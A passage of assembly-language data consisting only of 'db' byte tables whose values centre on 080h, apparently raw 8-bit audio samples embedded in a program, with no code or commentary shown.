083h,084h,082h,07Fh,082h,07Fh,087h,086h,082h,080h,076h,07Ch,07Bh + db 07Bh,082h,07Dh,07Eh,07Ah,07Fh,07Eh,085h,084h,082h,084h,07Eh,088h + db 07Fh,088h,07Eh,07Fh,07Dh,077h,07Ch,075h,07Dh,078h,07Bh,079h,07Fh + db 080h,084h,088h,081h,083h,087h,084h,087h,082h,089h,08Bh,08Fh,08Dh + db 08Bh,087h,080h,083h,081h,08Ch,07Ah,082h,076h,07Fh,07Bh,07Ah,07Ah + db 07Ch,077h,072h,077h,07Ch,07Fh,080h,07Eh,07Bh,07Dh,07Ah,080h,07Ch + db 07Eh,076h,082h,082h,08Dh,089h,084h,085h,085h,086h,087h,089h,086h + db 085h,08Ch,087h,090h,085h,07Ch,082h,083h,087h,07Ch,088h,07Bh,074h + db 091h,085h,09Bh,086h,086h,070h,076h,079h,08Dh,080h,06Bh,063h,069h + db 07Dh,067h,04Ch,081h,07Ah,0ABh,0A8h,09Ch,08Eh,060h,056h,07Fh,088h + db 089h,075h,094h,08Ch,013h,092h,040h,0D7h,0B0h,097h,0C4h,036h,057h + db 082h,0CBh,0C5h,09Dh,0C8h,00Dh,0A5h,026h,0A7h,072h,06Bh,0E0h,032h + db 089h,07Ah,0A7h,0E4h,0D7h,048h,07Fh,034h,07Bh,054h,06Fh,0B6h,02Bh + db 06Ah,055h,0ABh,0C0h,032h,09Fh,074h,06Fh,0A4h,043h,0B6h,040h,087h + db 090h,095h,0FFh,060h,015h,074h,039h,0E0h,044h,0D7h,080h,027h,0C9h + db 070h,0E7h,0F8h,025h,0AEh,009h,0ABh,050h,067h,0ACh,01Ch,0E3h,068h + db 09Fh,0FFh,02Fh,0CEh,014h,09Fh,080h,023h,0C4h,056h,0D3h,075h,0AFh + db 0F4h,035h,0A8h,000h,077h,040h,000h,09Ch,05Bh,0BBh,078h,0EBh,0D4h + db 07Fh,0A8h,007h,0BDh,032h,04Dh,092h,087h,0D4h,08Dh,0FFh,070h,0D7h + db 04Ch,06Bh,08Ch,01Ah,08Fh,078h,092h,087h,0CFh,0E8h,06Fh,0A0h,000h + db 0A5h,01Ch,007h,069h,073h,0B0h,07Fh,0FFh,068h,0D1h,028h,067h,070h + db 009h,09Bh,05Ch,0BFh,06Ch,0DFh,0A0h,09Fh,080h,01Bh,0A0h,020h,077h + db 082h,08Bh,0A8h,0A7h,0F0h,077h,0C8h,011h,0BAh,044h,033h,0B0h,069h + db 0B2h,08Eh,0FFh,068h,0DAh,018h,06Fh,060h,00Dh,0BAh,053h,0AFh,06Eh + db 0D7h,0B0h,07Fh,080h,00Ah,0B2h,020h,055h,080h,05Dh,098h,09Bh,0C0h + db 07Fh,094h,009h,0AFh,032h,05Bh,080h,05Ah,093h,093h,0FFh,071h,0DCh + db 030h,07Fh,080h,01Fh,0BBh,074h,0F2h,079h,0E7h,074h,0DFh,050h,03Fh + db 0A2h,02Ch,0B7h,070h,06Dh,072h,0AFh,0F0h,05Ah,0A2h,000h,095h,032h + db 01Fh,094h,06Bh,0E0h,054h,0F6h,059h,0E3h,048h,05Fh,0A0h,033h,0BFh + db 074h,073h,070h,0E7h,0A0h,06Bh,074h,000h,0A1h,024h,027h,065h,08Dh + db 097h,0BBh,0FFh,06Ah,0E2h,04Ah,07Fh,084h,003h,087h,04Fh,0CDh,075h + db 0E5h,0B8h,09Dh,0A8h,019h,0C2h,048h,047h,0A0h,05Ch,071h,077h,0FFh + db 068h,06Bh,074h,00Fh,0BBh,010h,077h,048h,087h,0A4h,087h,0FCh,07Dh + db 0F0h,040h,0C7h,082h,047h,0B8h,04Ah,099h,05Eh,0DBh,082h,087h,058h + db 000h,098h,020h,06Fh,072h,06Fh,0A8h,083h,0FFh,059h,0E5h,052h,067h + db 0AAh,028h,0B9h,03Fh,0C6h,05Ch,0AFh,0C0h,087h,0A0h,00Eh,0BBh,04Ah + db 08Fh,080h,03Fh,078h,064h,0FFh,068h,093h,068h,01Fh,0B6h,020h,092h + db 04Bh,0B7h,08Ah,095h,0D8h,08Bh,0C0h,021h,0C7h,06Ah,07Fh,09Ch,067h + db 085h,04Eh,0FFh,070h,09Fh,050h,000h,0ADh,021h,08Fh,058h,0BFh,084h + db 075h,0E0h,06Fh,0D0h,014h,0ABh,074h,077h,0B8h,046h,096h,056h,0EFh + db 098h,07Fh,098h,000h,0A3h,038h,05Fh,070h,06Fh,0A4h,04Bh,0E4h,054h + db 0D9h,040h,06Fh,098h,05Dh,0C2h,051h,095h,054h,095h,0DCh,06Fh,0B8h + db 000h,06Fh,068h,03Fh,0A0h,057h,0E0h,049h,0DDh,084h,0C7h,074h,025h + db 0D8h,05Bh,0E6h,04Ch,08Fh,068h,03Fh,0E8h,04Ah,0CFh,032h,033h,0A0h + db 039h,0C2h,040h,0D7h,05Ch,09Bh,0A0h,087h,098h,029h,0D5h,070h,09Fh + db 082h,07Bh,084h,03Dh,0D5h,068h,0BDh,02Ch,01Bh,0A8h,040h,0BDh,054h + db 0B3h,062h,04Fh,0D6h,064h,0D4h,039h,05Fh,098h,06Fh,0C8h,03Ah,0B1h + db 04Eh,06Fh,0A4h,07Fh,0AAh,011h,097h,06Ah,09Bh,094h,049h,0C0h,045h + db 0AFh,080h,09Dh,098h,022h,0BFh,062h,0BDh,065h,047h,0B0h,040h,0BFh + db 070h,0ADh,070h,01Dh,0C9h,067h,089h,06Ch,07Fh,0D0h,060h,0BFh,072h + db 09Bh,080h,000h,08Dh,052h,0ABh,064h,055h,0DAh,078h,0CBh,0A8h,0AFh + db 080h,016h,09Fh,062h,0AFh,04Ch,03Dh,0C0h,062h,05Fh,0C8h,05Bh,0CEh + db 024h,01Bh,084h,06Bh,08Ch,060h,0BFh,0A4h,09Dh,0FFh,060h,0BCh,01Ah + db 000h,0B0h,066h,0CCh,054h,073h,0D8h,085h,09Bh,0C8h,055h,0C2h,020h + db 001h,072h,056h,069h,07Ch,0AAh,0A8h,07Bh,0AFh,080h,087h,090h,018h + db 065h,071h,065h,0C2h,095h,0DAh,0B1h,09Ch,0C5h,08Ah,07Bh,080h,03Dh + db 044h,051h,05Fh,06Ah,075h,089h,07Eh,082h,083h,080h,06Eh,064h,062h + db 066h,075h,083h,08Bh,0A2h,0A6h,0A9h,0BAh,08Bh,091h,076h,07Bh,07Eh + db 069h,07Bh,064h,06Dh,080h,075h,079h,06Ah,077h,07Ah,071h,078h,06Fh + db 082h,07Ah,083h,090h,088h,07Ch,07Dh,088h,085h,089h,08Ah,085h,083h + db 091h,086h,089h,085h,079h,07Fh,07Bh,083h,07Eh,077h,078h,083h,07Fh + db 082h,08Bh,076h,079h,075h,07Fh,090h,074h,079h,075h,077h,072h,085h + db 084h,076h,07Eh,074h,07Dh,07Eh,07Ah,080h,080h,07Fh,077h,07Eh,07Ah + db 080h,080h,07Fh,088h,07Ch,084h,07Fh,07Fh,080h,081h,07Eh,079h,08Ah + db 087h,086h,083h,08Dh,086h,07Ch,08Ch,07Ah,07Bh,073h,087h,098h,082h + db 083h,07Dh,083h,07Ch,075h,083h,06Dh,077h,073h,085h,085h,072h,07Ch + db 077h,082h,07Ah,07Ch,075h,06Bh,06Ch,073h,082h,073h,075h,07Eh,074h + db 081h,087h,08Dh,088h,080h,075h,07Fh,08Dh,083h,097h,084h,081h,083h + db 085h,080h,078h,07Dh,078h,07Fh,082h,087h,08Ch,078h,082h,081h,086h + db 082h,07Dh,081h,07Bh,074h,078h,084h,078h,084h,080h,07Eh,079h,075h + db 079h,072h,081h,07Dh,08Bh,07Eh,07Bh,086h,082h,086h,07Fh,07Eh,077h + db 076h,084h,07Eh,080h,074h,077h,07Fh,090h,08Ch,085h,07Ah,062h,06Ah + db 080h,08Ch,08Dh,07Eh,072h,07Bh,082h,089h,095h,08Ah,06Fh,07Ah,083h + db 082h,083h,07Bh,077h,07Ah,079h,082h,07Dh,06Eh,077h,06Eh,082h,07Eh + db 088h,07Dh,07Fh,078h,071h,081h,075h,07Ch,086h,07Fh,086h,07Eh,085h + db 081h,086h,087h,08Dh,08Ah,076h,07Ah,07Ah,086h,085h,08Ah,086h,085h + db 07Dh,077h,078h,06Eh,07Fh,07Ah,07Dh,07Eh,074h,083h,079h,088h,07Ah + db 084h,078h,073h,081h,079h,086h,083h,081h,07Fh,082h,094h,080h,080h + db 06Eh,069h,07Ch,078h,07Eh,07Bh,07Ch,072h,086h,090h,086h,07Dh,079h + db 07Eh,084h,08Bh,07Eh,080h,080h,072h,090h,088h,07Ch,079h,076h,07Bh + db 07Fh,086h,07Ah,081h,07Dh,07Dh,08Ah,07Ah,080h,070h,075h,07Eh,079h + db 085h,073h,076h,075h,087h,087h,088h,084h,07Ch,07Ah,076h,077h,07Bh + db 079h,083h,07Bh,081h,07Dh,07Ch,07Fh,080h,081h,07Fh,08Ah,082h,082h + db 08Ch,082h,086h,086h,08Ah,083h,080h,071h,073h,07Fh,077h,084h,087h + db 081h,07Bh,07Fh,07Fh,087h,086h,079h,083h,077h,087h,07Ch,07Ch,07Ch + db 075h,082h,071h,076h,07Ch,076h,079h,079h,082h,070h,080h,07Ah,081h + db 087h,084h,07Ah,070h,07Dh,06Fh,082h,084h,07Eh,081h,07Bh,07Dh,07Fh + db 08Fh,07Dh,07Ch,084h,07Eh,07Bh,086h,088h,07Eh,08Fh,089h,075h,08Ah + db 07Dh,079h,07Dh,080h,079h,07Fh,086h,077h,078h,07Dh,06Eh,08Dh,07Fh + db 074h,076h,07Eh,078h,078h,08Dh,079h,07Eh,082h,07Eh,080h,087h,079h + db 076h,082h,074h,07Eh,081h,06Eh,074h,081h,082h,081h,092h,07Bh,07Fh + db 08Fh,08Ah,08Bh,07Ch,070h,074h,08Fh,07Eh,084h,084h,06Fh,075h,07Ah + db 08Eh,07Bh,07Ch,078h,078h,083h,086h,08Eh,07Eh,082h,070h,07Dh,08Dh + db 078h,07Bh,06Fh,077h,076h,087h,085h,074h,079h,077h,07Dh,085h,084h + db 06Bh,07Eh,07Eh,077h,086h,088h,079h,07Dh,091h,07Bh,081h,09Bh,073h + db 080h,07Bh,07Bh,090h,084h,070h,07Bh,08Ah,078h,07Fh,081h,071h,07Fh + db 082h,080h,074h,081h,07Bh,06Dh,07Fh,070h,078h,089h,07Ch,077h,089h + db 08Ah,07Fh,086h,07Eh,072h,081h,073h,068h,07Fh,082h,073h,085h,08Ah + db 086h,09Eh,093h,07Bh,081h,086h,069h,07Dh,086h,06Ch,07Fh,088h,088h + db 08Fh,09Ch,08Ch,079h,086h,074h,067h,06Dh,064h,069h,077h,07Fh,084h + db 09Fh,085h,08Dh,09Bh,074h,071h,06Ch,05Dh,062h,07Dh,06Dh,073h,086h + db 090h,091h,097h,092h,07Ah,079h,07Ch,061h,06Dh,076h,073h,070h,088h + db 090h,094h,09Bh,09Bh,094h,078h,077h,078h,060h,05Dh,069h,07Bh,087h + db 090h,09Fh,09Dh,09Fh,0A1h,080h,076h,068h,053h,04Bh,066h,072h,072h + db 086h,099h,097h,0A2h,0ADh,082h,06Ah,064h,05Ah,053h,061h,06Ah,067h + db 08Ah,0ABh,0ADh,0ACh,09Bh,0A5h,060h,067h,066h,059h,056h,06Fh,093h + db 08Fh,0BFh,0A8h,08Eh,0AFh,0AAh,044h,04Fh,070h,041h,057h,08Dh,084h + db 07Dh,0D1h,094h,07Eh,0BEh,088h,02Dh,06Ah,070h,038h,07Bh,0ABh,063h + db 0AFh,0A0h,068h,075h,0CDh,064h,013h,087h,068h,02Fh,0ABh,0B4h,037h + db 097h,0E0h,050h,097h,0F8h,022h,063h,0D4h,02Ah,07Dh,0E6h,038h,02Fh + db 0F9h,080h,047h,0E7h,0DAh,010h,07Fh,084h,034h,0B7h,0B0h,01Dh,035h + db 0D7h,0C0h,04Fh,0A1h,0B2h,002h,06Fh,0DEh,014h,087h,040h,001h,077h + db 0FFh,0A0h,032h,0BDh,0E2h,05Bh,0D7h,0C0h,000h,095h,02Ah,000h,0A7h + db 0C8h,02Ch,057h,0AEh,0C4h,09Fh,0E2h,030h,03Bh,0DCh,04Ah,02Fh,0FCh + db 084h,03Ah,0A5h,0D3h,094h,0BBh,0D8h,020h,07Fh,0A0h,018h,033h,0FFh + db 06Ch,009h,0A7h,0E2h,03Ah,0AFh,08Ah,000h,087h,068h,020h,09Fh,0D0h + db 040h,05Bh,0FFh,088h,03Fh,0D5h,01Ch,027h,0A0h,036h,04Fh,0FFh,0A8h + db 042h,0EFh,0D0h,05Eh,0F3h,0A0h,000h,05Bh,045h,03Dh,0F5h,0B4h,01Eh + db 057h,0FFh,060h,087h,0DCh,000h,007h,084h,04Ch,07Dh,0FFh,071h,02Dh + db 0FFh,0C4h,037h,0CFh,064h,000h,06Fh,038h,03Dh,0FFh,0C0h,034h,09Bh + db 0FFh,054h,0A3h,0C2h,000h,05Fh,050h,01Ah,09Fh,0FFh,050h,03Fh,0FFh + db 08Ch,073h,0F7h,034h,000h,07Ah,048h,073h,0FFh,080h,029h,0EFh,0D8h + db 02Eh,0ABh,068h,000h,08Dh,036h,028h,0F3h,0D8h,044h,08Fh,0FFh,04Ah + db 0AFh,0DAh,000h,02Bh,030h,03Fh,0D3h,0E8h,05Ah,07Fh,0FFh,068h,097h + db 0E2h,000h,00Bh,021h,03Fh,0A7h,0FFh,06Ch,063h,0FFh,078h,073h,0DFh + db 050h,000h,000h,04Dh,09Fh,0FFh,082h,033h,0E7h,0C0h,059h,0AFh,098h + db 000h,02Bh,03Fh,062h,0F1h,0A6h,073h,0DFh,0FFh,040h,08Bh,0D0h,000h + db 000h,017h,05Fh,0FDh,0FFh,058h,08Fh,0FFh,06Dh,0B7h,0ECh,008h,000h + db 027h,07Bh,0C6h,0D2h,075h,097h,0FFh,060h,076h,0C8h,018h,000h,000h + db 065h,0AFh,0FFh,096h,073h,0FFh,088h,07Fh,0DAh,040h,000h,000h,07Bh + db 09Fh,0E0h,082h,069h,0FFh,0D4h,05Fh,066h,080h,000h,027h,049h,062h + db 09Dh,0AAh,099h,0FFh,0F8h,038h,096h,0D4h,000h,000h,027h,077h,0FFh + db 0FCh,068h,09Fh,0FFh,065h,0AFh,0D8h,000h,000h,02Fh,09Ah,07Fh,088h + db 06Dh,0CFh,0FFh,062h,06Dh,0B1h,028h,000h,019h,065h,0BFh,0F4h,062h + db 08Bh,0FFh,084h,077h,0EBh,054h,000h,000h,05Dh,0AFh,0FFh,08Ah,057h + db 0FFh,068h,069h,0ABh,084h,000h,000h,065h,099h,0FFh,09Ch,05Bh,0EFh + db 0E4h,09Dh,093h,09Ah,000h,000h,07Fh,093h,08Eh,089h,06Ch,0E5h,0FFh + db 05Dh,074h,0CFh,038h,000h,023h,079h,09Bh,0DEh,091h,0AFh,0FFh,05Ch + db 073h,0A7h,084h,000h,000h,046h,09Fh,0FFh,080h,053h,0DFh,0E4h,077h + db 08Ah,0B8h,000h,000h,06Bh,089h,0A4h,084h,085h,0BFh,0FFh,050h,02Bh + db 0C7h,068h,000h,00Fh,055h,0B5h,0FFh,0D0h,014h,0CFh,084h,059h,0DDh + db 0C0h,000h,000h,08Fh,0B6h,0CBh,09Ah,050h,0D7h,0FFh,026h,055h,0A2h + db 008h,000h,03Bh,06Ch,08Ah,0D3h,094h,083h,0FFh,082h,091h,0E7h,060h + db 000h,00Ch,095h,082h,09Ch,0B3h,07Ah,0E7h,0FEh,028h,059h,0D7h,058h + db 000h,001h,03Fh,0BFh,0FFh,078h,063h,0FFh,086h,0B3h,0FFh,040h,000h + db 000h,06Dh,08Fh,0D9h,0A1h,060h,0B3h,0D2h,0C7h,074h,048h,000h,045h + db 04Bh,03Bh,097h,0B8h,0A2h,0D3h,0FFh,064h,071h,0CEh,004h,00Bh,01Bh + db 052h,07Bh,0C1h,0F6h,0A4h,0C5h,0C0h,065h,072h,0C6h,000h,000h,00Ah + db 03Fh,0DFh,0FFh,058h,06Bh,0FAh,044h,0A7h,0FFh,028h,000h,03Bh,0BDh + db 0FAh,0FFh,088h,07Bh,0FFh,058h,062h,057h,060h,000h,000h,043h,08Bh + db 0FFh,098h,06Ah,0E7h,0D0h,062h,08Ah,0B0h,000h,005h,05Fh,0B5h,0B2h + db 0A4h,072h,0D7h,0FFh,038h,087h,088h,01Ch,027h,053h,06Ah,09Dh,0FFh + db 070h,075h,0FDh,048h,063h,0C5h,080h,000h,015h,06Bh,0B7h,0FFh,084h + db 048h,0A7h,0E0h,061h,0B3h,088h,000h,031h,03Eh,062h,09Bh,0ECh,058h + db 05Bh,0FFh,054h,06Bh,0B5h,0A0h,000h,000h,061h,091h,0FFh,090h,043h + db 0EFh,0B8h,09Ah,09Fh,0A8h,000h,027h,031h,05Bh,09Ch,0BAh,0B0h,0BFh + db 0F5h,04Ah,07Fh,0E5h,042h,000h,000h,056h,0BBh,0FFh,090h,03Fh,0FFh + db 090h,0BFh,0D7h,094h,000h,000h,05Fh,08Eh,0FFh,080h,04Eh,0A5h,0D8h + db 07Fh,064h,094h,000h,000h,03Bh,088h,074h,068h,0BFh,0FBh,0FFh,04Ah + db 05Fh,0A5h,092h,015h,000h,01Fh,07Bh,0FFh,0FFh,052h,0DFh,050h,09Fh + db 0D3h,0C0h,000h,000h,053h,08Dh,0FFh,098h,036h,087h,0D4h,08Bh,06Dh + db 0B4h,000h,000h,035h,07Dh,0CBh,0F8h,0BAh,074h,0FFh,078h,075h,09Ah + db 050h,000h,000h,0AEh,082h,073h,0A6h,0B0h,0FFh,0C8h,03Bh,052h,099h + db 032h,000h,023h,044h,07Fh,0FFh,0FFh,058h,087h,046h,07Bh,0F3h,0CAh + db 000h,000h,05Fh,0CAh,0FFh,0FEh,024h,077h,0B8h,039h,076h,0B4h,00Eh + db 000h,02Bh,08Eh,0ABh,0FFh,070h,063h,0FFh,080h,09Ch,0BBh,054h,000h + db 00Fh,06Ah,0A5h,0D6h,09Ah,099h,0DDh,0D4h,056h,067h,094h,000h,000h + db 01Dh,066h,0BBh,0FFh,070h,067h,0D0h,06Fh,096h,0DEh,048h,000h,036h + db 06Fh,09Ah,0FFh,070h,027h,0C9h,056h,06Ch,08Fh,084h,000h,023h,057h + db 086h,0FFh,0F4h,080h,04Fh,0F5h,06Eh,082h,0C9h,020h,000h,003h,05Bh + db 099h,0FFh,0C0h,03Ch,0EBh,080h,08Fh,09Dh,0A8h,006h,00Eh,056h,077h + db 0DFh,0FFh,060h,07Fh,0B0h,06Eh,062h,0CEh,01Ah,017h,047h,05Dh,085h + db 0FFh,0FFh,040h,097h,05Ah,05Eh,06Fh,0B4h,000h,037h,050h,07Fh,0ABh + db 0FFh,0D8h,000h,0A7h,040h,047h,07Fh,08Ch,01Ch,023h,06Dh,080h,0C7h + db 0FFh,080h,019h,0D2h,030h,056h,09Fh,070h,018h,02Dh,086h,0A8h,0FFh + db 0FFh,070h,08Fh,0A0h,03Ch,018h,09Fh,070h,00Ah,053h,095h,099h,0FFh + db 0FFh,044h,08Bh,088h,02Dh,00Fh,0ADh,044h,006h,067h,0A2h,085h,0EBh + db 0FFh,030h,04Fh,094h,013h,000h,0BBh,035h,037h,083h,08Ch,093h,0FFh + db 0FFh,040h,06Dh,0A8h,023h,027h,0AFh,034h,047h,072h,092h,07Fh,0EBh + db 0FFh,054h,04Bh,0C0h,039h,044h,09Dh,054h,055h,075h,0C6h,084h,096h + db 0FFh,0A0h,033h,0BFh,04Ch,02Ch,056h,08Ah,055h,087h,0B3h,062h,051h + db 0C7h,0DCh,02Eh,08Fh,094h,020h,02Ah,07Dh,06Eh,0BDh,0ACh,06Ch,04Ch + db 0A3h,0FFh,080h,03Eh,0B3h,030h,02Ah,04Dh,08Eh,04Dh,095h,0A3h,06Ch + db 057h,0AFh,0FFh,060h,05Bh,0D5h,032h,04Fh,06Fh,064h,05Eh,0CDh,0A0h + db 03Ah,06Fh,0CDh,0C0h,04Ah,082h,0DBh,02Ch,06Dh,04Bh,04Eh,087h,0B8h + db 06Bh,058h,07Fh,09Eh,0CCh,072h,073h,0D5h,030h,06Fh,067h,048h,05Bh + db 0BAh,09Ch,058h,07Dh,099h,0D4h,094h,06Ch,0C3h,04Ch,079h,03Eh,025h + db 06Bh,0D4h,078h,072h,07Bh,07Ah,0BBh,0C1h,04Ah,08Bh,088h,02Bh,058h + db 034h,046h,0DDh,09Ah,080h,072h,06Ch,08Fh,0FFh,070h,013h,0B1h,030h + db 086h,055h,05Fh,0C7h,0B4h,082h,075h,087h,08Dh,0FFh,078h,000h,0A7h + db 058h,07Bh,070h,03Ah,05Bh,0BCh,08Eh,0A8h,0ACh,034h,08Fh,0D8h,028h + db 05Bh,0E0h,028h,07Fh,059h,029h,0ABh,0CCh,064h,06Bh,080h,049h,0AFh + db 0D0h,023h,07Fh,0B0h,00Eh,089h,061h,02Fh,0B7h,0B2h,070h,092h,088h + db 06Fh,0EFh,090h,023h,09Bh,0B4h,035h,08Ch,03Dh,03Fh,0D3h,094h,08Bh + db 0C7h,060h,03Bh,0B9h,082h,069h,0CFh,0A0h,027h,084h,02Ah,04Bh,0EFh + db 08Ch,07Eh,08Ch,050h,05Fh,0E3h,079h,04Fh,0AFh,078h,01Bh,081h,02Ch + db 03Dh,0D3h,078h,077h,0B3h,066h,055h,0BFh,082h,069h,0B2h,0A8h,025h + db 08Ah,035h,043h,0D3h,09Ch,07Bh,09Bh,05Ah,03Dh,0AFh,0C6h,07Fh,077h + db 07Fh,062h,06Ah,096h,05Dh,073h,0AAh,06Ah,08Ch,08Ah,054h,04Fh,08Eh + db 0AAh,07Bh,06Fh,09Ch,070h,05Dh,084h,056h,07Fh,0C5h,085h,073h,060h + db 05Ah,071h,0C3h,0A8h,050h,056h,064h,071h,087h,0ACh,04Bh,071h,088h + db 074h,0A4h,08Bh,085h,069h,072h,0A9h,090h,067h,07Ch,0A8h,038h,07Fh + db 088h,05Bh,07Fh,0A5h,06Ah,073h,0B9h,05Bh,056h,0B2h,05Ah,042h,0A2h + db 0CCh,044h,037h,079h,055h,073h,0E2h,0A5h,06Bh,091h,062h,056h,0B7h + db 0ACh,051h,05Fh,0A1h,090h,02Eh,0A3h,07Eh,045h,09Fh,0A2h,07Ch,095h + db 08Ah,070h,067h,0AEh,074h,055h,0A7h,0DBh,018h,033h,066h,06Ch,07Bh + db 0C3h,090h,049h,07Dh,093h,076h,0B3h,0B0h,041h,046h,0A3h,08Dh,02Ah + db 08Fh,075h,046h,087h,0B2h,07Bh,07Eh,091h,06Eh,071h,09Fh,08Ah,069h + db 070h,092h,08Ah,04Fh,096h,090h,056h,07Dh,090h,084h,07Dh,0A1h,086h + db 066h,084h,08Bh,073h,081h,080h,084h,072h,089h,082h,06Bh,06Eh,07Fh + db 080h,077h,079h,095h,091h,059h,059h,081h,070h,069h,08Bh,08Eh,088h + db 059h,07Ch,06Dh,097h,083h,06Eh,07Fh,087h,093h,087h,078h,05Ch,078h + db 098h,07Eh,077h,08Fh,097h,062h,067h,080h,066h,07Eh,0A1h,07Ah,07Dh + db 089h,095h,078h,055h,073h,092h,08Ch,077h,07Dh,096h,092h,04Ah,05Fh + db 06Eh,087h,092h,08Ch,082h,085h,092h,078h,058h,06Ch,092h,073h,073h + db 086h,08Eh,07Fh,05Eh,04Ah,06Ch,073h,092h,0A0h,07Eh,090h,097h,08Bh + db 073h,070h,078h,089h,089h,075h,079h,08Fh,08Eh,07Ah,040h,05Fh,07Ch + db 086h,085h,0A2h,0A9h,084h,07Fh,075h,05Ch,073h,09Ch,076h,061h,07Fh + db 079h,075h,092h,082h,031h,069h,086h,076h,09Fh,0B1h,07Eh,073h,092h + db 06Bh,067h,097h,087h,074h,078h,07Ah,085h,099h,065h,067h,088h,054h + db 069h,085h,084h,087h,0A3h,08Ch,078h,09Fh,086h,053h,067h,07Ch,068h + db 075h,092h,078h,072h,07Ch,062h,07Dh,0AFh,090h,06Bh,07Ch,06Eh,068h + db 08Fh,0A0h,078h,06Ah,072h,075h,08Dh,08Ch,07Eh,089h,072h,054h,072h + db 08Bh,089h,07Fh,072h,06Bh,08Ah,0A2h,089h,08Fh,085h,066h,071h,093h + db 088h,074h,078h,06Dh,070h,08Ah,088h,089h,08Dh,072h,06Bh,080h,078h + db 079h,070h,069h,06Ch,07Ch,08Bh,082h,08Bh,078h,06Ah,087h,081h,07Eh + db 08Eh,070h,05Fh,079h,085h,07Fh,087h,07Ah,05Fh,08Ah,0A4h,076h,079h + db 080h,06Ah,069h,075h,07Eh,093h,0A5h,081h,072h,088h,088h,085h,090h + db 078h,060h,071h,07Bh,07Fh,084h,07Ah,068h,07Ah,08Ch,07Fh,07Ah,070h + db 068h,076h,07Ch,077h,093h,0A2h,080h,086h,07Dh,07Bh,083h,08Eh,068h + db 064h,074h,06Eh,077h,097h,074h,068h,080h,080h,071h,08Bh,07Ch,059h + db 079h,08Ah,074h,099h,09Ch,066h,07Fh,0A6h,07Fh,08Fh,0A0h,056h,06Dh + db 0A2h,06Ch,07Dh,09Dh,060h,05Fh,098h,072h,063h,097h,088h,048h,07Dh + db 085h,069h,0A3h,088h,04Eh,063h,09Fh,091h,077h,08Ch,074h,042h,085h + db 09Ch,06Ch,095h,066h,051h,08Fh,0CFh,07Ah,073h,09Ah,080h,065h,097h + db 080h,05Ah,081h,04Ch,04Ah,09Eh,09Ch,074h,07Fh,083h,086h,097h,09Ah + db 069h,07Fh,08Ch,060h,06Fh,0A0h,077h,06Eh,08Ch,08Eh,07Dh,083h,083h + db 064h,07Ah,074h,05Eh,079h,09Fh,07Ah,063h,083h,092h,069h,091h,088h + db 052h,075h,070h,069h,08Fh,0A0h,06Bh,074h,0ABh,08Eh,062h,08Dh,066h + db 063h,08Ah,071h,07Bh,0BBh,098h,068h,087h,0A4h,077h,097h,08Ch,044h + db 056h,069h,071h,0A7h,094h,05Dh,05Eh,0A4h,07Ch,077h,08Eh,05Ch,04Dh + db 07Eh,074h,07Bh,0ACh,078h,059h,0A3h,0A4h,060h,082h,084h,049h,075h + db 081h,07Eh,0ADh,0A5h,071h,07Fh,0BAh,074h,071h,084h,04Ah,05Bh,073h + db 071h,087h,0ADh,07Ch,062h,0ADh,093h,073h,097h,06Ah,03Fh,070h,077h + db 07Bh,0B5h,088h,058h,08Bh,0A8h,061h,079h,080h,045h,06Eh,075h,071h + db 09Bh,0B2h,072h,06Bh,0B0h,080h,078h,096h,061h,042h,05Fh,073h,08Dh + db 0B4h,088h,068h,0A3h,096h,06Fh,08Dh,07Ch,04Ah,05Eh,06Ch,07Fh,0BBh + db 0A0h,070h,08Fh,0B0h,07Eh,07Fh,08Ah,040h,030h,063h,086h,0AFh,0ACh + db 066h,063h,0B3h,080h,07Ch,07Eh,04Ch,03Fh,059h,079h,096h,09Bh,084h + db 077h,0ADh,090h,071h,085h,080h,03Eh,041h,073h,093h,0D3h,0B2h,076h + db 091h,09Ah,083h,0A3h,090h,040h,038h,05Bh,08Ah,0A7h,088h,071h,086h + db 090h,06Bh,07Eh,083h,052h,043h,057h,08Bh,0BBh,0C0h,080h,07Fh,0AAh + db 068h,07Bh,094h,050h,030h,048h,076h,09Dh,0A6h,07Dh,072h,0A7h,07Ah + db 069h,07Ah,07Dh,054h,065h,06Ch,085h,0A9h,0AAh,095h,0B2h,09Ch,059h + db 089h,0A1h,04Ch,049h,060h,07Eh,0C3h,0C0h,080h,083h,0A9h,067h,07Bh + db 08Dh,060h,03Ch,05Ah,085h,081h,07Eh,079h,08Dh,0B3h,060h,05Bh,07Bh + db 064h,03Dh,053h,06Ch,093h,0B5h,090h,08Ah,0BBh,07Ah,06Fh,08Fh,076h + db 046h,05Fh,070h,087h,0B3h,08Ch,07Ch,0AEh,078h,059h,085h,07Eh,048h + db 050h,07Bh,09Dh,0C1h,0A1h,08Fh,09Fh,098h,073h,085h,07Ch,048h,055h + db 07Ah,083h,083h,08Bh,08Bh,0A0h,0A8h,068h,06Fh,087h,05Eh,04Ah,061h + db 083h,095h,0A1h,090h,08Fh,0A8h,068h,067h,07Fh,062h,03Ah,056h,06Eh + db 097h,0B3h,087h,076h,09Fh,096h,06Ah,083h,080h,043h,056h,07Eh,088h + db 087h,08Fh,090h,0ADh,0B4h,060h,066h,08Dh,06Dh,044h,05Ch,075h,096h + db 0CAh,08Ch,063h,098h,071h,079h,087h,078h,044h,04Bh,083h,097h,09Bh + db 08Ah,07Ch,09Eh,0ACh,061h,05Fh,07Fh,062h,04Ah,067h,08Ah,095h,0BBh + db 098h,08Ch,0BDh,084h,085h,091h,06Ch,045h,059h,085h,08Bh,095h,08Bh + db 083h,0A4h,08Ch,04Dh,06Ah,08Bh,060h,048h,05Eh,07Fh,0ADh,0CCh,07Ch + db 068h,09Ch,064h,083h,089h,054h,036h,04Fh,07Dh,096h,0AFh,088h,072h + db 086h,0A0h,08Bh,074h,05Bh,04Dh,073h,078h,087h,09Eh,09Dh,092h,0A5h + db 0BCh,076h,07Bh,085h,059h,055h,06Ch,081h,093h,0A7h,0A1h,07Bh,07Ch + db 084h,06Dh,07Ch,07Bh,042h,039h,057h,07Dh,0C5h,0ACh,05Ah,071h,092h + db 06Ah,08Ah,09Fh,061h,046h,06Eh,099h,0BBh,0ABh,076h,073h,0A4h,068h + db 069h,06Fh,061h,036h,04Dh,07Bh,09Fh,0D1h,0A2h,081h,0B2h,098h,07Eh + db 093h,086h,04Bh,04Dh,077h,08Dh,0A7h,092h,07Ah,09Dh,0A0h,057h,072h + db 07Ah,05Ch,063h,065h,06Fh,09Fh,0CDh,08Dh,074h,09Ch,060h,063h,089h + db 070h,035h,046h,070h,095h,0C6h,090h,061h,085h,094h,06Ah,07Fh,07Eh + db 04Ah,05Ch,066h,076h,0A5h,0BAh,090h,087h,0BAh,082h,07Eh,095h,086h + db 